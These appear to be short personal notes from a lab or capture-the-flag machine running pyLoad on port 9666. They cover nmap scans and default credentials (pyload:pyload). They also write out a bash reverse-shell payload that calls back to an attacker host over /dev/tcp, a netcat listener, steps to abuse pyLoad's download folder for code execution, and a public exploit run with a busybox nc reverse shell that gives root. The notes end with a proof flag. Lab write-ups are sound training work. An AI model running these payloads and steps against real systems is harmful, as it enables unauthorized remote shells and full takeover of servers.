Enum
sudo nmap -T4 -A -v -oN nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -oN vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -oN alltcp --min-rate 1000 $IP
sudo nmap -T4 -sU -sV -sC -v -oN udp --min-rate 1000 $IP
sudo nmap -A -v -p- -oN alltcpslow $IP
Services:
ssh 22
pyload 9666
Default creds on pyload worked:
pyload:pyload
Found these:
GitHub: Download to arbitrary folder can lead to RCE
Packet Storm: PyLoad 0.5.0 Remote Code Execution
Trying the first one
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/<attacker_ip>/9999 0>&1' > evil.sh
sudo python3 -m http.server 80
nc -lvnp 9999
On pyLoad
Change pyLoad file permission settings
Change permissions of downloads: On
Permission mode for downloaded files: 0744
Create a package with link pointing to the attacker
http://<attacker_ip>/evil.sh
Edit package and change folder to /config/scripts/package_deleted/
Refresh package. Wait up to 60 seconds for scripts to be processed by pyLoad
Delete any package to trigger the script
This did not work; back to the other RCE.
Confirmed valid; now let's get a shell (with nc listening on 4444 first):
python3 exploit.py -t http://192.168.245.26:9666 -c 'busybox nc 192.168.45.171 4444 -e sh'
instant root.
proof.txt
b873d3335d7831c4e91fb12e6a9196eb